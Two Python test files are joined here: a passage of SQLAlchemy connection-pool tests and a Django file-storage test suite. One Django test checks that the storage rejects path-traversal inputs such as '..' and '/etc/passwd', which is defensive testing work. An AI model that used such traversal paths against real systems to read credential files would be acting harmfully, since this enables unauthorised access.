with patch("sqlalchemy.pool.base.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1, max_overflow=0, recycle=30
)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not_(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.connection is None
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not_(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
c2.invalidate(soft=True)
is_(c2_rec.connection, c2.connection)
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not_(c3.connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.connection, c3.connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record, pool, ref, echo, fairy=None
):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback"
)
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy
)
return patch.object(pool, "_finalize_fairy", assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
    """Shared assertions: after a failed reconnect, the pool's
    checkedout/overflow counters are restored so later checkouts
    neither leak a slot nor hang waiting for one."""
    # p is QueuePool with size=1, max_overflow=2,
    # and one connection in the pool that will need to
    # reconnect when next used (either due to recycle or invalidate)
    with self._no_wr_finalize():
        eq_(p.checkedout(), 0)
        eq_(p._overflow, 0)
        dbapi.shutdown(True)
        assert_raises(Exception, p.connect)
        eq_(p._overflow, 0)
        eq_(p.checkedout(), 0)  # and not 1
        dbapi.shutdown(False)
        c1 = self._with_teardown(p.connect())  # noqa
        assert p._pool.empty()  # poolsize is one, so we're empty OK
        c2 = self._with_teardown(p.connect())  # noqa
        eq_(p._overflow, 1)  # and not 2
        # this hangs if p._overflow is 2
        c3 = self._with_teardown(p.connect())
        c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
    """Counter cleanup when the pooled connection was invalidated
    before being returned."""
    dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
    fairy = p.connect()
    fairy.invalidate()
    fairy.close()
    self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
    """Counter cleanup when the pooled connection must reconnect
    because its 1-second recycle interval elapsed before reuse."""
    dbapi, p = self._queuepool_dbapi_fixture(
        pool_size=1, max_overflow=2, recycle=1
    )
    c1 = p.connect()
    c1.close()
    time.sleep(1.5)
    self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_connect_handler_not_called_for_recycled(self):
    """test [ticket:3497] -- after a shutdown/invalidate cycle, the
    next successful checkout fires exactly one ``connect`` and one
    ``checkout`` event."""
    dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
    canary = Mock()
    c1 = p.connect()
    c2 = p.connect()
    c1.close()
    c2.close()
    dbapi.shutdown(True)
    # force a hard invalidation so all pooled connections are stale
    bad = p.connect()
    p._invalidate(bad)
    bad.close()
    assert p._invalidate_time
    event.listen(p, "connect", canary.connect)
    event.listen(p, "checkout", canary.checkout)
    assert_raises(Exception, p.connect)
    # drop records whose DBAPI connection was lost to the shutdown
    p._pool.queue = collections.deque(
        [c for c in p._pool.queue if c.connection is not None]
    )
    dbapi.shutdown(False)
    c = p.connect()
    c.close()
    # exactly one fresh connect plus one checkout were observed
    eq_(
        canary.mock_calls,
        [call.connect(ANY, ANY), call.checkout(ANY, ANY, ANY)],
    )
def test_connect_checkout_handler_always_gets_info(self):
    """test [ticket:3497] -- the ``.info`` dict populated by the
    ``connect`` handler is visible to the ``checkout`` handler, even
    for connections refreshed after invalidation."""
    dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
    c1 = p.connect()
    c2 = p.connect()
    c1.close()
    c2.close()
    dbapi.shutdown(True)
    bad = p.connect()
    p._invalidate(bad)
    bad.close()
    assert p._invalidate_time

    @event.listens_for(p, "connect")
    def connect(conn, conn_rec):
        conn_rec.info["x"] = True

    @event.listens_for(p, "checkout")
    def checkout(conn, conn_rec, conn_f):
        # must see the key set by the connect handler above
        assert "x" in conn_rec.info

    assert_raises(Exception, p.connect)
    # drop records whose DBAPI connection was lost to the shutdown
    p._pool.queue = collections.deque(
        [c for c in p._pool.queue if c.connection is not None]
    )
    dbapi.shutdown(False)
    c = p.connect()
    c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
    """Counter cleanup when the reconnect failure comes from a user
    ``checkout`` handler raising DisconnectionError rather than from
    the DBAPI itself."""
    dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
    c1 = p.connect()
    c1.close()

    @event.listens_for(p, "checkout")
    def handle_checkout_event(dbapi_con, con_record, con_proxy):
        if dbapi.is_shutdown:
            raise tsa.exc.DisconnectionError()

    self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.predictable_gc
def test_userspace_disconnectionerror_weakref_finalizer(self):
    """A connection rejected via a user DisconnectionError handler is
    simply closed -- not reset a second time -- when its fairy is
    reclaimed through the weakref finalizer path."""
    dbapi, pool = self._queuepool_dbapi_fixture(
        pool_size=1, max_overflow=2
    )

    @event.listens_for(pool, "checkout")
    def handle_checkout_event(dbapi_con, con_record, con_proxy):
        if getattr(dbapi_con, "boom") == "yes":
            raise tsa.exc.DisconnectionError()

    conn = pool.connect()
    old_dbapi_conn = conn.connection
    conn.close()
    # one rollback from the normal reset-on-return
    eq_(old_dbapi_conn.mock_calls, [call.rollback()])
    old_dbapi_conn.boom = "yes"
    conn = pool.connect()
    dbapi_conn = conn.connection
    del conn
    gc_collect()
    # new connection was reset on return appropriately
    eq_(dbapi_conn.mock_calls, [call.rollback()])
    # old connection was just closed - did not get an
    # erroneous reset on return
    eq_(old_dbapi_conn.mock_calls, [call.rollback(), call.close()])
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
    """Concurrent invalidations racing against slow connection closes
    must not cause the engine to recreate more than one replacement
    pool (``len(pools) <= 2``)."""
    def slow_close():
        slow_closing_connection._slow_close()
        time.sleep(0.5)

    slow_closing_connection = Mock()
    slow_closing_connection.connect.return_value.close = slow_close

    class Error(Exception):
        pass

    dialect = Mock()
    dialect.is_disconnect = lambda *arg, **kw: True
    dialect.dbapi.Error = Error
    pools = []

    class TrackQueuePool(pool.QueuePool):
        # record every pool instance so recreations can be counted
        def __init__(self, *arg, **kw):
            pools.append(self)
            super(TrackQueuePool, self).__init__(*arg, **kw)

    def creator():
        return slow_closing_connection.connect()

    p1 = TrackQueuePool(creator=creator, pool_size=20)
    from sqlalchemy import create_engine

    eng = create_engine(testing.db.url, pool=p1, _initialize=False)
    eng.dialect = dialect
    # 15 total connections
    conns = [eng.connect() for i in range(15)]
    # return 7 of them back to the pool (conns[3:10])
    for conn in conns[3:10]:
        conn.close()

    def attempt(conn):
        time.sleep(random.random())
        try:
            conn._handle_dbapi_exception(
                Error(), "statement", {}, Mock(), Mock()
            )
        except tsa.exc.DBAPIError:
            pass

    # run an error + invalidate operation on all 15 connections,
    # 8 of which are still checked out
    threads = []
    for conn in conns:
        t = threading.Thread(target=attempt, args=(conn,))
        t.start()
        threads.append(t)
    for t in threads:
        t.join()
    # return all 15 connections to the pool
    for conn in conns:
        conn.close()
    # re-open 15 total connections
    conns = [eng.connect() for i in range(15)]
    # 15 connections have been fully closed due to invalidate
    assert slow_closing_connection._slow_close.call_count == 15
    # 15 initial connections + 15 reconnections
    assert slow_closing_connection.connect.call_count == 30
    assert len(pools) <= 2, len(pools)
def test_invalidate(self):
    """Invalidating a fairy forces a brand new DBAPI connection on
    the following checkout."""
    p = self._queuepool_fixture(pool_size=1, max_overflow=0)
    fairy = p.connect()
    original_id = fairy.connection.id
    fairy.close()
    fairy = None
    fairy = p.connect()
    # still the pooled connection after a plain close
    assert fairy.connection.id == original_id
    fairy.invalidate()
    fairy = None
    fairy = p.connect()
    # the invalidated connection was discarded and replaced
    assert fairy.connection.id != original_id
def test_recreate(self):
    """recreate() yields a fresh pool carrying over the original
    configuration."""
    source = self._queuepool_fixture(
        reset_on_return=None, pool_size=1, max_overflow=0
    )
    clone = source.recreate()
    assert clone.size() == 1
    assert clone._reset_on_return is pool.reset_none
    assert clone._use_threadlocal is False
    assert clone._max_overflow == 0
def test_reconnect(self):
    """tests reconnect operations at the pool level. SA's
    engine/dialect includes another layer of reconnect support for
    'database was lost' errors."""
    dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
    c1 = p.connect()
    c_id = c1.connection.id
    c1.close()
    c1 = None
    c1 = p.connect()
    assert c1.connection.id == c_id
    # simulate the DBAPI failing from here on
    dbapi.raise_error = True
    c1.invalidate()
    c1 = None
    c1 = p.connect()
    # the pool replaced the failed connection
    assert c1.connection.id != c_id
def test_detach(self):
    """A detached connection leaves the pool's management: the pool
    dials a new one, and only an explicit close touches the raw
    connection."""
    dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
    detached = p.connect()
    detached.detach()
    second = p.connect()  # noqa
    # two separate DBAPI connects were made
    eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
    raw = detached.connection
    assert raw is not None
    eq_(raw.close.call_count, 0)
    detached.close()
    eq_(raw.close.call_count, 1)
def test_detach_via_invalidate(self):
    """Invalidation closes the old DBAPI connection immediately and
    detaches it from the fairy."""
    dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
    fairy = p.connect()
    old_raw = fairy.connection
    fairy.invalidate()
    assert fairy.connection is None
    eq_(old_raw.close.call_count, 1)
    replacement = p.connect()
    assert replacement.connection is not old_raw
    replacement_raw = replacement.connection
    replacement.close()
    # the healthy replacement is pooled, not closed
    eq_(replacement_raw.close.call_count, 0)
def test_no_double_checkin(self):
    """Checking a record in twice emits a warning rather than
    corrupting pool state."""
    p = self._queuepool_fixture(pool_size=1)
    fairy = p.connect()
    record = fairy._connection_record
    fairy.close()
    expected = "Double checkin attempted on %s" % record
    assert_raises_message(Warning, expected, record.checkin)
def test_lifo(self):
    """With ``use_lifo=True`` the most recently checked-in connection
    is always handed out first."""
    raw_a, raw_b, raw_c = Mock(), Mock(), Mock()
    pending = [raw_a, raw_b, raw_c]

    def creator():
        return pending.pop(0)

    p = pool.QueuePool(creator, use_lifo=True)
    f1 = p.connect()
    f2 = p.connect()
    f3 = p.connect()
    f1.close()
    f2.close()
    f3.close()
    # the last connection returned (raw_c) keeps coming back first
    for _ in range(5):
        f1 = p.connect()
        is_(f1.connection, raw_c)
        f1.close()
    f1 = p.connect()
    is_(f1.connection, raw_c)
    f2 = p.connect()
    is_(f2.connection, raw_b)
    f2.close()
    f3 = p.connect()
    is_(f3.connection, raw_b)
    f2 = p.connect()
    is_(f2.connection, raw_a)
    f2.close()
    f3.close()
    f1.close()
def test_fifo(self):
    """Default (FIFO) ordering: the oldest checked-in connection is
    handed out first."""
    raw_a, raw_b, raw_c = Mock(), Mock(), Mock()
    pending = [raw_a, raw_b, raw_c]

    def creator():
        return pending.pop(0)

    p = pool.QueuePool(creator)
    f1 = p.connect()
    f2 = p.connect()
    f3 = p.connect()
    f1.close()
    f2.close()
    f3.close()
    f1 = p.connect()
    is_(f1.connection, raw_a)
    f1.close()
    f1 = p.connect()
    is_(f1.connection, raw_b)
    f2 = p.connect()
    is_(f2.connection, raw_c)
    f2.close()
    f3 = p.connect()
    is_(f3.connection, raw_a)
    f2 = p.connect()
    is_(f2.connection, raw_c)
    f2.close()
    f3.close()
    f1.close()
class ResetOnReturnTest(PoolTestBase):
    """What gets emitted on the DBAPI connection at checkin for each
    ``reset_on_return`` mode, with and without a ``_reset_agent``."""

    def _fixture(self, **kw):
        # returns (mock DBAPI, QueuePool over it)
        dbapi = Mock()
        return (
            dbapi,
            pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
        )

    def test_plain_rollback(self):
        dbapi, p = self._fixture(reset_on_return="rollback")
        c1 = p.connect()
        c1.close()
        assert dbapi.connect().rollback.called
        assert not dbapi.connect().commit.called

    def test_plain_commit(self):
        dbapi, p = self._fixture(reset_on_return="commit")
        c1 = p.connect()
        c1.close()
        assert not dbapi.connect().rollback.called
        assert dbapi.connect().commit.called

    def test_plain_none(self):
        dbapi, p = self._fixture(reset_on_return=None)
        c1 = p.connect()
        c1.close()
        assert not dbapi.connect().rollback.called
        assert not dbapi.connect().commit.called

    def test_agent_rollback(self):
        # a _reset_agent takes precedence over the plain DBAPI reset
        dbapi, p = self._fixture(reset_on_return="rollback")

        class Agent(object):
            def __init__(self, conn):
                self.conn = conn

            def rollback(self):
                self.conn.special_rollback()

            def commit(self):
                self.conn.special_commit()

        c1 = p.connect()
        c1._reset_agent = Agent(c1)
        c1.close()
        assert dbapi.connect().special_rollback.called
        assert not dbapi.connect().special_commit.called
        assert not dbapi.connect().rollback.called
        assert not dbapi.connect().commit.called
        # with no agent on the second cycle, plain rollback applies
        c1 = p.connect()
        c1.close()
        eq_(dbapi.connect().special_rollback.call_count, 1)
        eq_(dbapi.connect().special_commit.call_count, 0)
        assert dbapi.connect().rollback.called
        assert not dbapi.connect().commit.called

    def test_agent_commit(self):
        dbapi, p = self._fixture(reset_on_return="commit")

        class Agent(object):
            def __init__(self, conn):
                self.conn = conn

            def rollback(self):
                self.conn.special_rollback()

            def commit(self):
                self.conn.special_commit()

        c1 = p.connect()
        c1._reset_agent = Agent(c1)
        c1.close()
        assert not dbapi.connect().special_rollback.called
        assert dbapi.connect().special_commit.called
        assert not dbapi.connect().rollback.called
        assert not dbapi.connect().commit.called
        # with no agent on the second cycle, plain commit applies
        c1 = p.connect()
        c1.close()
        eq_(dbapi.connect().special_rollback.call_count, 0)
        eq_(dbapi.connect().special_commit.call_count, 1)
        assert not dbapi.connect().rollback.called
        assert dbapi.connect().commit.called

    def test_reset_agent_disconnect(self):
        dbapi, p = self._fixture(reset_on_return="rollback")

        class Agent(object):
            def __init__(self, conn):
                self.conn = conn

            def rollback(self):
                # invalidate the connection mid-reset, then fail
                p._invalidate(self.conn)
                raise Exception("hi")

            def commit(self):
                self.conn.commit()

        c1 = p.connect()
        c1._reset_agent = Agent(c1)
        c1.close()
        # no warning raised.  We know it would warn due to
        # QueuePoolTest.test_no_double_checkin
class SingletonThreadPoolTest(PoolTestBase):
    """Tests for SingletonThreadPool, the per-thread pool used for
    SQLite ``:memory:`` connections."""

    @testing.requires.threading_with_mock
    def test_cleanup(self):
        self._test_cleanup(False)

    # TODO: the SingletonThreadPool cleanup method
    # has an unfixed race condition within the "cleanup" system that
    # leads to this test being off by one connection under load; in any
    # case, this connection will be closed once it is garbage collected.
    # this pool is not a production-level pool and is only used for the
    # SQLite "memory" connection, and is not very useful under actual
    # multi-threaded conditions
    # @testing.requires.threading_with_mock
    # def test_cleanup_no_gc(self):
    #     self._test_cleanup(True)

    def _test_cleanup(self, strong_refs):
        """test that the pool's connections are OK after cleanup() has
        been called."""
        dbapi = MockDBAPI()
        lock = threading.Lock()

        def creator():
            # the mock iterator isn't threadsafe...
            with lock:
                return dbapi.connect()

        p = pool.SingletonThreadPool(creator=creator, pool_size=3)
        if strong_refs:
            # keep strong references so close counts can be inspected
            sr = set()

            def _conn():
                c = p.connect()
                sr.add(c.connection)
                return c

        else:

            def _conn():
                return p.connect()

        def checkout():
            for x in range(10):
                c = _conn()
                assert c
                c.cursor()
                c.close()
                time.sleep(0.1)

        threads = []
        for i in range(10):
            th = threading.Thread(target=checkout)
            th.start()
            threads.append(th)
        for th in threads:
            th.join(join_timeout)
        lp = len(p._all_conns)
        # pool_size is 3; 4 is tolerated per the race noted in the
        # TODO above
        is_true(3 <= lp <= 4)
        if strong_refs:
            still_opened = len([c for c in sr if not c.close.call_count])
            eq_(still_opened, 3)

    def test_no_rollback_from_nested_connections(self):
        """A nested checkout of the same thread-local connection does
        not trigger a reset until the outermost checkin."""
        dbapi = MockDBAPI()
        lock = threading.Lock()

        def creator():
            # the mock iterator isn't threadsafe...
            with lock:
                return dbapi.connect()

        p = pool.SingletonThreadPool(creator=creator, pool_size=3)
        c1 = p.connect()
        mock_conn = c1.connection
        c2 = p.connect()
        is_(c1, c2)
        c2.close()
        eq_(mock_conn.mock_calls, [])
        c1.close()
        eq_(mock_conn.mock_calls, [call.rollback()])
class AssertionPoolTest(PoolTestBase):
    """AssertionPool allows exactly one outstanding checkout and
    raises AssertionError on a second concurrent one."""

    def test_connect_error(self):
        dbapi = MockDBAPI()
        p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
        held = p.connect()  # noqa
        # a second checkout while one is outstanding must fail
        assert_raises(AssertionError, p.connect)

    def test_connect_multiple(self):
        dbapi = MockDBAPI()
        p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
        # sequential checkout/checkin cycles are fine
        for _ in range(2):
            fairy = p.connect()
            fairy.close()
        held = p.connect()  # noqa
        assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
    """NullPool opens a brand new DBAPI connection on every checkout."""

    def test_reconnect(self):
        dbapi = MockDBAPI()
        p = pool.NullPool(creator=lambda: dbapi.connect("foo.db"))
        fairy = p.connect()
        fairy.close()
        fairy = None
        fairy = p.connect()
        fairy.invalidate()
        fairy = None
        fairy = p.connect()
        # each checkout dialed the DBAPI afresh
        dbapi.connect.assert_has_calls(
            [call("foo.db"), call("foo.db")], any_order=True
        )
class StaticPoolTest(PoolTestBase):
    """StaticPool.recreate() shares the creator with the original."""

    def test_recreate(self):
        dbapi = MockDBAPI()

        def creator():
            return dbapi.connect("foo.db")

        original = pool.StaticPool(creator)
        duplicate = original.recreate()
        assert original._creator is duplicate._creator
class CreatorCompatibilityTest(PoolTestBase):
    """The pool's ``_creator`` must be callable both with no arguments
    and with a connection-record argument, and runtime monkeypatching
    of ``_creator`` must be detected."""

    def test_creator_callable_outside_noarg(self):
        e = testing_engine()
        creator = e.pool._creator
        try:
            # NOTE(review): if creator() raises, ``conn`` is unbound and
            # the finally clause itself raises NameError -- confirm intent
            conn = creator()
        finally:
            conn.close()

    def test_creator_callable_outside_witharg(self):
        e = testing_engine()
        creator = e.pool._creator
        try:
            conn = creator(Mock())
        finally:
            conn.close()

    def test_creator_patching_arg_to_noarg(self):
        e = testing_engine()
        creator = e.pool._creator
        try:
            # the creator is the two-arg form
            conn = creator(Mock())
        finally:
            conn.close()

        def mock_create():
            return creator()

        conn = e.connect()
        conn.invalidate()
        conn.close()
        # test that the 'should_wrap_creator' status
        # will dynamically switch if the _creator is monkeypatched.
        # patch it with a zero-arg form
        with patch.object(e.pool, "_creator", mock_create):
            conn = e.connect()
            conn.invalidate()
            conn.close()
        conn = e.connect()
        conn.close()
|
tests.py | # -*- coding: utf-8 -*-
import os
import shutil
import sys
import tempfile
import time
from cStringIO import StringIO
from datetime import datetime, timedelta
from django.conf import settings
from django.core.exceptions import SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.images import get_image_dimensions
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import UploadedFile
from django.core.exceptions import ImproperlyConfigured
from django.utils import unittest
try:
import threading
except ImportError:
import dummy_threading as threading
# Try to import PIL in either of the two ways it can end up installed.
# Checking for the existence of Image is enough for CPython, but
# for PyPy, you need to check for the underlying modules
try:
from PIL import Image, _imaging
except ImportError:
try:
import Image, _imaging
except ImportError:
Image = None
class GetStorageClassTests(unittest.TestCase):
    """Success and failure paths of get_storage_class().

    NOTE: Python 2 era code (``except error, e`` syntax); kept as-is.
    """

    def assertRaisesErrorWithMessage(self, error, message, callable,
        *args, **kwargs):
        # assert both the exception type and its exact message text
        self.assertRaises(error, callable, *args, **kwargs)
        try:
            callable(*args, **kwargs)
        except error, e:
            self.assertEqual(message, str(e))

    def test_get_filesystem_storage(self):
        """
        get_storage_class returns the class for a storage backend name/path.
        """
        self.assertEqual(
            get_storage_class('django.core.files.storage.FileSystemStorage'),
            FileSystemStorage)

    def test_get_invalid_storage_module(self):
        """
        get_storage_class raises an error if the requested import don't exist.
        """
        self.assertRaisesErrorWithMessage(
            ImproperlyConfigured,
            "NonExistingStorage isn't a storage module.",
            get_storage_class,
            'NonExistingStorage')

    def test_get_nonexisting_storage_class(self):
        """
        get_storage_class raises an error if the requested class don't exist.
        """
        self.assertRaisesErrorWithMessage(
            ImproperlyConfigured,
            'Storage module "django.core.files.storage" does not define a '\
            '"NonExistingStorage" class.',
            get_storage_class,
            'django.core.files.storage.NonExistingStorage')

    def test_get_nonexisting_storage_module(self):
        """
        get_storage_class raises an error if the requested module don't exist.
        """
        self.assertRaisesErrorWithMessage(
            ImproperlyConfigured,
            'Error importing storage module django.core.files.non_existing_'\
            'storage: "No module named non_existing_storage"',
            get_storage_class,
            'django.core.files.non_existing_storage.NonExistingStorage')
class FileStorageTests(unittest.TestCase):
    """Exercises the FileSystemStorage API against a throwaway temp
    directory.  Subclasses override ``storage_class`` to rerun the
    whole suite against a custom backend."""
    # backend under test; overridden by CustomStorageTests
    storage_class = FileSystemStorage

    def setUp(self):
        # mktemp() + makedirs rather than mkdtemp(): gives a fresh,
        # initially non-existent path that we create ourselves
        self.temp_dir = tempfile.mktemp()
        os.makedirs(self.temp_dir)
        self.storage = self.storage_class(location=self.temp_dir,
            base_url='/test_media_url/')

    def tearDown(self):
        shutil.rmtree(self.temp_dir)

    def test_file_access_options(self):
        """
        Standard file access options are available, and work as expected.
        """
        self.failIf(self.storage.exists('storage_test'))
        f = self.storage.open('storage_test', 'w')
        f.write('storage contents')
        f.close()
        self.assert_(self.storage.exists('storage_test'))
        f = self.storage.open('storage_test', 'r')
        self.assertEqual(f.read(), 'storage contents')
        f.close()
        self.storage.delete('storage_test')
        self.failIf(self.storage.exists('storage_test'))

    def test_file_accessed_time(self):
        """
        File storage returns a Datetime object for the last accessed time of
        a file.
        """
        self.failIf(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        atime = self.storage.accessed_time(f_name)
        self.assertEqual(atime, datetime.fromtimestamp(
            os.path.getatime(self.storage.path(f_name))))
        # freshly saved, so the access time is recent
        self.assertTrue(datetime.now() - self.storage.accessed_time(f_name) < timedelta(seconds=2))
        self.storage.delete(f_name)

    def test_file_created_time(self):
        """
        File storage returns a Datetime object for the creation time of
        a file.
        """
        self.failIf(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        ctime = self.storage.created_time(f_name)
        self.assertEqual(ctime, datetime.fromtimestamp(
            os.path.getctime(self.storage.path(f_name))))
        self.assertTrue(datetime.now() - self.storage.created_time(f_name) < timedelta(seconds=2))
        self.storage.delete(f_name)

    def test_file_modified_time(self):
        """
        File storage returns a Datetime object for the last modified time of
        a file.
        """
        self.failIf(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        mtime = self.storage.modified_time(f_name)
        self.assertEqual(mtime, datetime.fromtimestamp(
            os.path.getmtime(self.storage.path(f_name))))
        self.assertTrue(datetime.now() - self.storage.modified_time(f_name) < timedelta(seconds=2))
        self.storage.delete(f_name)

    def test_file_save_without_name(self):
        """
        File storage extracts the filename from the content object if no
        name is given explicitly.
        """
        self.failIf(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f.name = 'test.file'
        storage_f_name = self.storage.save(None, f)
        self.assertEqual(storage_f_name, f.name)
        self.assert_(os.path.exists(os.path.join(self.temp_dir, f.name)))
        self.storage.delete(storage_f_name)

    def test_file_path(self):
        """
        File storage returns the full path of a file
        """
        self.failIf(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.assertEqual(self.storage.path(f_name),
            os.path.join(self.temp_dir, f_name))
        self.storage.delete(f_name)

    def test_file_url(self):
        """
        File storage returns a url to access a given file from the Web.
        """
        self.assertEqual(self.storage.url('test.file'),
            '%s%s' % (self.storage.base_url, 'test.file'))
        # without a base_url the storage cannot build URLs at all
        self.storage.base_url = None
        self.assertRaises(ValueError, self.storage.url, 'test.file')

    def test_file_with_mixin(self):
        """
        File storage can get a mixin to extend the functionality of the
        returned file.
        """
        self.failIf(self.storage.exists('test.file'))

        class TestFileMixin(object):
            mixed_in = True

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.assert_(isinstance(
            self.storage.open('test.file', mixin=TestFileMixin),
            TestFileMixin
        ))
        self.storage.delete('test.file')

    def test_listdir(self):
        """
        File storage returns a tuple containing directories and files.
        """
        self.failIf(self.storage.exists('storage_test_1'))
        self.failIf(self.storage.exists('storage_test_2'))
        self.failIf(self.storage.exists('storage_dir_1'))
        f = self.storage.save('storage_test_1', ContentFile('custom content'))
        f = self.storage.save('storage_test_2', ContentFile('custom content'))
        os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
        dirs, files = self.storage.listdir('')
        self.assertEqual(set(dirs), set([u'storage_dir_1']))
        self.assertEqual(set(files),
            set([u'storage_test_1', u'storage_test_2']))
        self.storage.delete('storage_test_1')
        self.storage.delete('storage_test_2')
        os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))

    def test_file_storage_prevents_directory_traversal(self):
        """
        File storage prevents directory traversal (files can only be accessed if
        they're below the storage location).
        """
        self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
        self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
class CustomStorage(FileSystemStorage):
    def get_available_name(self, name):
        """
        Append numbers to duplicate files rather than underscores, like Trac.
        """
        pieces = name.split('.')
        stem, extensions = pieces[0], pieces[1:]
        counter = 2
        # bump the counter until an unused name is found
        while self.exists(name):
            name = '.'.join([stem, str(counter)] + extensions)
            counter += 1
        return name
class CustomStorageTests(FileStorageTests):
    # Re-runs the entire FileStorageTests suite against CustomStorage.
    storage_class = CustomStorage

    def test_custom_get_available_name(self):
        first = self.storage.save('custom_storage', ContentFile('custom contents'))
        self.assertEqual(first, 'custom_storage')
        # a duplicate name gets a numeric suffix, Trac-style
        second = self.storage.save('custom_storage', ContentFile('more contents'))
        self.assertEqual(second, 'custom_storage.2')
        self.storage.delete(first)
        self.storage.delete(second)
class UnicodeFileNameTests(unittest.TestCase):
    def test_unicode_file_names(self):
        """
        Regression test for #8156: files with unicode names I can't quite figure
        out the encoding situation between doctest and this file, but the actual
        repr doesn't matter; it just shouldn't return a unicode object.
        """
        # NOTE(review): the name literal below appears mojibake-damaged
        # (plausibly u'\xbfC\xf3mo?'); it is runtime data, so it is left
        # untouched here -- verify the file's source encoding
        uf = UploadedFile(name=u'ยฟCรณmo?',content_type='text')
        self.assertEqual(type(uf.__repr__()), str)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
    # A ContentFile whose chunks() stalls for a second, widening the
    # save-time race window exercised by FileSaveRaceConditionTest.
    def chunks(self):
        time.sleep(1)
        # NOTE(review): super(ContentFile, self) skips ContentFile's own
        # chunks() and dispatches to ContentFile's base class -- confirm
        # this is intentional rather than a typo for super(SlowFile, self)
        return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
    """Two concurrent saves to the same name must produce two distinct
    files (regression for #4948); SlowFile keeps the race window open."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)
        self.thread = threading.Thread(target=self.save_file, args=['conflict'])

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def save_file(self, name):
        name = self.storage.save(name, SlowFile("Data"))

    def test_race_condition(self):
        self.thread.start()
        name = self.save_file('conflict')
        self.thread.join()
        # one save kept the original name, the other was renamed
        self.assert_(self.storage.exists('conflict'))
        self.assert_(self.storage.exists('conflict_1'))
        self.storage.delete('conflict')
        self.storage.delete('conflict_1')
class FileStoragePermissions(unittest.TestCase):
    """Saved files receive the mode set in
    settings.FILE_UPLOAD_PERMISSIONS (Python 2 octal literals)."""

    def setUp(self):
        # mutate the global setting; restored in tearDown
        self.old_perms = settings.FILE_UPLOAD_PERMISSIONS
        settings.FILE_UPLOAD_PERMISSIONS = 0666
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        settings.FILE_UPLOAD_PERMISSIONS = self.old_perms
        shutil.rmtree(self.storage_dir)

    def test_file_upload_permissions(self):
        name = self.storage.save("the_file", ContentFile("data"))
        # mask with 0777 to compare only the permission bits
        actual_mode = os.stat(self.storage.path(name))[0] & 0777
        self.assertEqual(actual_mode, 0666)
class FileStoragePathParsing(unittest.TestCase):
    """How duplicate-name mangling interacts with dots in directory
    and file names."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def test_directory_with_dot(self):
        """Regression test for #9610.

        If the directory name contains a dot and the file name doesn't, make
        sure we still mangle the file name instead of the directory name.
        """
        self.storage.save('dotted.path/test', ContentFile("1"))
        self.storage.save('dotted.path/test', ContentFile("2"))
        self.failIf(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
